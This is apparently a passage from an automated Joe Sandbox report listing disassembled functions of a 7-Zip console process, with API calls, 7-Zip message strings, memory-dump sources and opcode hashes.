                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmovewcscmp
                                • String ID:
                                • API String ID: 3584677832-0
                                • Opcode ID: 302d0e8c5851f6606c1dcc2b539dfa9425df06aa2e85257a86ade80d1dc13571
                                • Instruction ID: ba491ed5b2dfb13c720a23c4e63ab87654708aac6c9fbcce2c6be26b7d3b4138
                                • Opcode Fuzzy Hash: 302d0e8c5851f6606c1dcc2b539dfa9425df06aa2e85257a86ade80d1dc13571
                                • Instruction Fuzzy Hash: F5818D36A01A84D6CF20EF56D89016E7361E348B98F44A23BDB2947764DB3DCC9EC709
                                Function 0041138C Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 176COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: Incorrect switch postfix:$Multiple instances for switch:$Too long switch:$Too short switch:$Unknown switch:
                                • API String ID: 1294909896-2104980125
                                • Opcode ID: 2731b4e1964a7c269a4293f4648909575aaddce048e3c321215691093f0b9513
                                • Instruction ID: 22d986cf97962af9c3913335f4767e0070934fa0541368068a063449f56f4dee
                                • Opcode Fuzzy Hash: 2731b4e1964a7c269a4293f4648909575aaddce048e3c321215691093f0b9513
                                • Instruction Fuzzy Hash: 9261F0726056D4B6CB20EF25D5806EE7722F381798F809217DB8A87725EB7CC5CAC709
                                Function 0045DF30 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 133COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID: #
                                • API String ID: 1534225298-1885708031
                                • Opcode ID: 9f75db4a75c95e80460666ce991bc5cb072ca817b398ef2d3bb69d1fa6707b94
                                • Instruction ID: 9280e6ba3273ba65aa815b0c7246e14deb0b415e548c1ee7963ad44e6e6be69e
                                • Opcode Fuzzy Hash: 9f75db4a75c95e80460666ce991bc5cb072ca817b398ef2d3bb69d1fa6707b94
                                • Instruction Fuzzy Hash: 05517F36314B8482CB649B27E48029EA361F7C9B94F584216EF9E477A6DF7CC94AC704
                                Function 0043FCA0 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 104COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: -bit$DIRS$PGP$TAG$ZERO
                                • API String ID: 1294909896-2593822073
                                • Opcode ID: e5fe60c4106dc734c329ee4b6546d7a8d3d2cf1fbb7484c544a0f86324b991a4
                                • Instruction ID: 1744d8c1961a32a647f191225a164cfc9ecdb99073dbce9bb76cd5d5d6e9a51d
                                • Opcode Fuzzy Hash: e5fe60c4106dc734c329ee4b6546d7a8d3d2cf1fbb7484c544a0f86324b991a4
                                • Instruction Fuzzy Hash: 4B418673624680A1DF30EF21E4812DF6721F79478DF841127F68D42A29EB6CCB89C749
                                Function 00442250 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 102COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004138A8: free.MSVCRT ref: 004138E0
                                  • Part of subcall function 00448580: wcscmp.MSVCRT ref: 00448642
                                  • Part of subcall function 00448580: free.MSVCRT ref: 0044866E
                                  • Part of subcall function 00448580: free.MSVCRT ref: 00448678
                                  • Part of subcall function 00448580: free.MSVCRT ref: 004486B5
                                  • Part of subcall function 00448580: free.MSVCRT ref: 004486BD
                                  • Part of subcall function 00448580: free.MSVCRT ref: 004486CB
                                  • Part of subcall function 00448580: free.MSVCRT ref: 004486F9
                                  • Part of subcall function 00448580: free.MSVCRT ref: 00448701
                                  • Part of subcall function 00448580: free.MSVCRT ref: 0044870F
                                • free.MSVCRT ref: 00442331
                                • free.MSVCRT ref: 0044233F
                                  • Part of subcall function 00455A44: _CxxThrowException.MSVCRT ref: 00455A74
                                  • Part of subcall function 00455A44: memmove.MSVCRT ref: 00455AAD
                                  • Part of subcall function 00455A44: free.MSVCRT ref: 00455AB5
                                  • Part of subcall function 00412350: malloc.MSVCRT ref: 00412360
                                  • Part of subcall function 00412350: _CxxThrowException.MSVCRT ref: 0041237B
                                • free.MSVCRT ref: 004423A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ExceptionThrow$mallocmemmovewcscmp
                                • String ID: A0$Hash$sha256 sha512 sha224 sha384 sha1 sha md5 crc32 crc64 asc cksum
                                • API String ID: 1621466233-3656212537
                                • Opcode ID: 802e8e9a2c2ea77edc8e4468999b6a89d01a219b9ea440f3f32d330f1b06e641
                                • Instruction ID: ea66dda6d30de362066cc7bb801668e62465332f2be41672cc7ce8d685a70f0f
                                • Opcode Fuzzy Hash: 802e8e9a2c2ea77edc8e4468999b6a89d01a219b9ea440f3f32d330f1b06e641
                                • Instruction Fuzzy Hash: 44414832109B8486C720DF26F55039EFBE4F7D4B84F44421AAB9987BA9DBBCC595CB04
                                Function 0041D5E8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 79stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041D298: GetModuleHandleW.KERNEL32 ref: 0041D2D4
                                  • Part of subcall function 0041D298: GetProcAddress.KERNEL32 ref: 0041D2ED
                                  • Part of subcall function 0041D298: free.MSVCRT ref: 0041D40F
                                  • Part of subcall function 0041D298: free.MSVCRT ref: 0041D41A
                                  • Part of subcall function 0041CC68: GetSystemInfo.KERNEL32 ref: 0041CC88
                                • strcmp.MSVCRT ref: 0041D66A
                                • free.MSVCRT ref: 0041D6C9
                                • free.MSVCRT ref: 0041D6D4
                                • free.MSVCRT ref: 0041D6DF
                                • free.MSVCRT ref: 0041D71B
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$AddressHandleInfoModuleProcSystemstrcmp
                                • String ID: -
                                • API String ID: 3961349729-3695764949
                                • Opcode ID: b7cbed1331cb7d55189943225399f2c26065b17822c77ed4446776fd064686b3
                                • Instruction ID: 503fd2942fff9a8b30f2e542be57068dd23715f642d5bcc604009591d61e7b5b
                                • Opcode Fuzzy Hash: b7cbed1331cb7d55189943225399f2c26065b17822c77ed4446776fd064686b3
                                • Instruction Fuzzy Hash: 7F31967210464591CA10EB26F5512DEA730EBD2398F801127FA5E866B9DFBCC9D5CB08
                                Function 004623DC Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 76COMMON
                                Download Yara Rule
                                APIs
                                • free.MSVCRT ref: 00462460
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputsfreememset
                                • String ID: Alternate streams$Alternate streams size$Files$Folders$Size
                                • API String ID: 3433497869-232602582
                                • Opcode ID: 6fcc76a1e59de7e7b71cc1d779308d819524d07daae1383483ddc2ba5f22816f
                                • Instruction ID: 12b830fe814fdb580feda120518f95f71214cdbc8b60611b6e7d4f9604f24e20
                                • Opcode Fuzzy Hash: 6fcc76a1e59de7e7b71cc1d779308d819524d07daae1383483ddc2ba5f22816f
                                • Instruction Fuzzy Hash: 4031D461204A8052CA28EB27E6503EE6311F742BD8F484217DF5E57BA2EFACD495C34A
                                Function 00417130 Relevance: 9.1, APIs: 6, Instructions: 74fileCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$FileMove
                                • String ID:
                                • API String ID: 288606353-0
                                • Opcode ID: 57cac637d8e0234f60b055ac2bc110f97c18c8dc58c2764d229503f95f95ff27
                                • Instruction ID: 5ff01b2848e61010cf905f0cd56ebc457c5698a42ede1c3e93d48101b3d08761
                                • Opcode Fuzzy Hash: 57cac637d8e0234f60b055ac2bc110f97c18c8dc58c2764d229503f95f95ff27
                                • Instruction Fuzzy Hash: 4111A83324958555CB60AB26E8506EF5730EBC2BD4F441227FEAA87365DE2CC8C6C608
                                Function 00418510 Relevance: 9.1, APIs: 6, Instructions: 74COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004182EC: FindClose.KERNELBASE ref: 004182FE
                                • SetLastError.KERNEL32 ref: 0041854A
                                • SetLastError.KERNEL32 ref: 00418559
                                • FindFirstStreamW.KERNELBASE ref: 0041857B
                                • GetLastError.KERNEL32 ref: 0041858A
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ErrorLast$Find$CloseFirstStream
                                • String ID:
                                • API String ID: 4071060300-0
                                • Opcode ID: 87f636497580bb4fbcbf63b8265a63744168a08ebcc718e05caac09440743ee9
                                • Instruction ID: 31027ac60542b8a9e9ee3a78a1b9bb681ab34fb68ed7dbce223036002067976c
                                • Opcode Fuzzy Hash: 87f636497580bb4fbcbf63b8265a63744168a08ebcc718e05caac09440743ee9
                                • Instruction Fuzzy Hash: 5C21C772204A4092DB709B22E4443EE5361FB9A778F544326EE7A477D4DF3CC985C208
                                Function 0045E5D8 Relevance: 9.1, APIs: 6, Instructions: 68timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: freememmove$CompareCriticalEnterFileSectionTime
                                • String ID:
                                • API String ID: 706800807-0
                                • Opcode ID: 58a0885f6d86d70a921f35c9044090e0a72a65f2069e27a2fc9408c344482038
                                • Instruction ID: 2cf5df8f9ae944450c3e6d46bfe07795dc8c83c448cfb5fa16807a673740a3a8
                                • Opcode Fuzzy Hash: 58a0885f6d86d70a921f35c9044090e0a72a65f2069e27a2fc9408c344482038
                                • Instruction Fuzzy Hash: C22191B220168596DB14DF36D44439D3360F325F98F944226CF5D43399EF38C99AC745
                                Function 00461D3C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 138COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputsfree$memset
                                • String ID: Name$Size
                                • API String ID: 219391080-481755742
                                • Opcode ID: f50bf753fe3b21e9c7a45b0368b88930d19db5076f6c523b08c3b18d06e9c53f
                                • Instruction ID: d8759a9b581f4048fd1ba7a87abba3f5ce9ace1fbee7d5f5e10bfd4d542aedf1
                                • Opcode Fuzzy Hash: f50bf753fe3b21e9c7a45b0368b88930d19db5076f6c523b08c3b18d06e9c53f
                                • Instruction Fuzzy Hash: ED41253271468482CB10DF26D6907AE2361F345BD9F889127EF2A47765EF3DC982C30A
                                Function 0046D020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? , xrefs: 0046D052
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputsfree
                                • String ID: (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit?
                                • API String ID: 2581285248-171671738
                                • Opcode ID: 646732ebcff86c9df6dad86610872ba6a7d61547c425be7e6e005f2518e3d884
                                • Instruction ID: 1e9d3c8385b3f1383ec98ee077551b751496891265af3d5d7d58115ec2353fdd
                                • Opcode Fuzzy Hash: 646732ebcff86c9df6dad86610872ba6a7d61547c425be7e6e005f2518e3d884
                                • Instruction Fuzzy Hash: 1D317262F0864887EA209B15D9A13EA1361D38679CF440127DB4A477A6FA9DCDD6830B
                                Function 004111C0 Relevance: 8.8, APIs: 7, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                • Opcode ID: eb28851d751b3b4e06c9240cb3829b97f60d0f29b318ad5cc70f7edf96630afe
                                • Instruction ID: e2aacf706a07b237766b50525a1b6b0aa60c555cbeaf6df2e69f55aa9a5a4e85
                                • Opcode Fuzzy Hash: eb28851d751b3b4e06c9240cb3829b97f60d0f29b318ad5cc70f7edf96630afe
                                • Instruction Fuzzy Hash: EE317032215A4891CA20EF22E5511DE6720EBC5B99B444227BE5E9B7B9DE3CC9C6C704
                                Function 0046636C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$fputc
                                • String ID: Time =
                                • API String ID: 1185151155-458291097
                                • Opcode ID: 711248068497e3291dd49fbd5432339c07565143dcf9c95a36100e20513cfbb6
                                • Instruction ID: 4df6600268dbd9c68b32612bc985381e3f2cab0479c4d1ee237d21fa28dac7ca
                                • Opcode Fuzzy Hash: 711248068497e3291dd49fbd5432339c07565143dcf9c95a36100e20513cfbb6
                                • Instruction Fuzzy Hash: 9121A8D5351A1186EB08AF1BEC4035A5311A798FC8F48A036DF0E177A8DE3CC896C308
                                Function 0046BE98 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 63COMMON
                                Download Yara Rule
                                APIs
                                • fputs.MSVCRT ref: 0046BF9D
                                • free.MSVCRT ref: 0046BFA9
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$freememset
                                • String ID: Archive size: $Files read from disk$Volumes:
                                • API String ID: 2276422817-73833580
                                • Opcode ID: 43f740754bcbdfb30a1c5616ebad1511aae0edfbe7f48177f9860e470449e485
                                • Instruction ID: d9fc8a18938d6b6f2efca78100774755689cafe505f73cfe97d332feb53b0244
                                • Opcode Fuzzy Hash: 43f740754bcbdfb30a1c5616ebad1511aae0edfbe7f48177f9860e470449e485
                                • Instruction Fuzzy Hash: 5C214F7220488590CF20EF25E9913DEA730E7847ACF844627A65E875B9DF6CC6DBC708
                                Function 00453110 Relevance: 8.8, APIs: 7, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 91324675b78ba19f9b05da73786a397c313983f0b342506a06a986321d12e703
                                • Instruction ID: 0349fe02bf539a8d79d67699f678fb2320e9a14fb45ebcf6b8e932ec95aae203
                                • Opcode Fuzzy Hash: 91324675b78ba19f9b05da73786a397c313983f0b342506a06a986321d12e703
                                • Instruction Fuzzy Hash: C401C832682A5C46C710AF32E9416ED1310E781BF9F440326EE395B795CE1CC8A28308
                                Function 00466DB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                • fputs.MSVCRT ref: 00466DF0
                                  • Part of subcall function 00412790: fputs.MSVCRT ref: 004127D9
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127E5
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127F0
                                  • Part of subcall function 004124C4: fputc.MSVCRT ref: 004124D5
                                • free.MSVCRT ref: 00466E22
                                • fputs.MSVCRT ref: 00466E40
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputsfree$fputc
                                • String ID: : $----------------
                                • API String ID: 3584323934-4071417161
                                • Opcode ID: a2e08ee020855fc09d43b6ad867d9afbb1a1935186b9ea7eaf3066c7f30c3438
                                • Instruction ID: 0c4f502f61c82300a81e5b435ccc6a7822ae503a772d3b205483b64dc3ebd4d4
                                • Opcode Fuzzy Hash: a2e08ee020855fc09d43b6ad867d9afbb1a1935186b9ea7eaf3066c7f30c3438
                                • Instruction Fuzzy Hash: 8F0165B6705A41C6DA20EB27EA9076A2321F785BE8F058326DF6E43794DF3CD492C704
                                Function 0046BDE4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45COMMON
                                Download Yara Rule
                                APIs
                                • fputs.MSVCRT ref: 0046BE42
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                • fputs.MSVCRT ref: 0046BE6F
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$memset
                                • String ID: Creating archive: $StdOut$Updating archive:
                                • API String ID: 3543874852-1319951512
                                • Opcode ID: a9c4aabd2ff01d6524ba5e04df4a9e699f916eef4c00c3739375fc96b2054783
                                • Instruction ID: 90582fd62f6764cb73db887f6466bfccc6d5a683a7eecbcdd10d7b0a1d5a8302
                                • Opcode Fuzzy Hash: a9c4aabd2ff01d6524ba5e04df4a9e699f916eef4c00c3739375fc96b2054783
                                • Instruction Fuzzy Hash: 26012DA2301A4581EF04AF26D5943E92361EB44FD8F0895378F0E8B359EF2DC8D9C359
                                Function 004640C0 Relevance: 8.8, APIs: 7, Instructions: 40COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 45413b0386e91511af95a0f8a487d460f1c606b597beb1b450eac350a4d7b625
                                • Instruction ID: 2bbfb319fc9bd896b0eb161cd569ebbbbef728913a36676f7fc18198983eb9b2
                                • Opcode Fuzzy Hash: 45413b0386e91511af95a0f8a487d460f1c606b597beb1b450eac350a4d7b625
                                • Instruction Fuzzy Hash: 67F0813379195D86CB11BE37EA510AC1320AB86FD87484227AF1D9F355DE6CCCE28384
                                Function 0046BFD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39COMMON
                                Download Yara Rule
                                APIs
                                • fputs.MSVCRT ref: 0046C000
                                  • Part of subcall function 00412790: fputs.MSVCRT ref: 004127D9
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127E5
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127F0
                                • fputs.MSVCRT ref: 0046C043
                                  • Part of subcall function 004124C4: fputc.MSVCRT ref: 004124D5
                                • free.MSVCRT ref: 0046C057
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
